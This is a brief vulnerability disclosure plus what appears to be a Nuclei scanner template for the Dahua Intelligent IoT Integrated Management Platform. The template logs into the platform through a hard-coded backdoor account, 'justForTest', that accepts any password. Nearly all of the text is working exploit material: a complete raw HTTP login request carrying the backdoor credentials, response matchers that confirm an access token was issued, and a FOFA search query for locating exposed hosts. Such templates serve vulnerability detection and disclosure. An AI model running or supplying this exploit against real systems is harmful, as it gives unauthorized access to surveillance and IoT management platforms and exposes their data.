There is a vulnerability in the user login interface /evo-apigw/evo-oauth/oauth/token of Zhejiang Dahua Technology Co., Ltd. Intelligent IoT Integrated Management Platform. Users can successfully log in to the platform using justForTest/any password, causing information leakage.
PoC代码[已公开]
id: dahua-icc-backdoor-user
info:
name: Dahua Intelligent IoT - Information Disclosure
author: DhiyaneshDk
severity: high
description: |
There is a vulnerability in the user login interface /evo-apigw/evo-oauth/oauth/token of Zhejiang Dahua Technology Co., Ltd. Intelligent IoT Integrated Management Platform. Users can successfully log in to the platform using justForTest/any password, causing information leakage.
metadata:
verified: true
max-request: 1
fofa-query: icon_hash="-1935899595"body="*客户端会小于800*"
tags: dahua,exposure,backdoor,bypass,vuln
http:
- raw:
- |
POST /evo-apigw/evo-oauth/oauth/token HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=justForTest&password=1&grant_type=password&client_id=web_client&client_secret=web_client&public_key=
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"success":'
- '"access_token":'
- '"token_type":'
- 'magicId'
condition: and
- type: word
part: header
words:
- 'application/json'
# digest: 4b0a00483046022100d9fa8f4cc82aad6bc968fea2327a40c16b8f9c6f8cb7ab6a9baa8e5b79877e3d022100caf7e9388c45662cbf7e0e195b45a6a97168bb351706374fc27304f5f99c395e:922c64590222798bb761d5b6d8e72950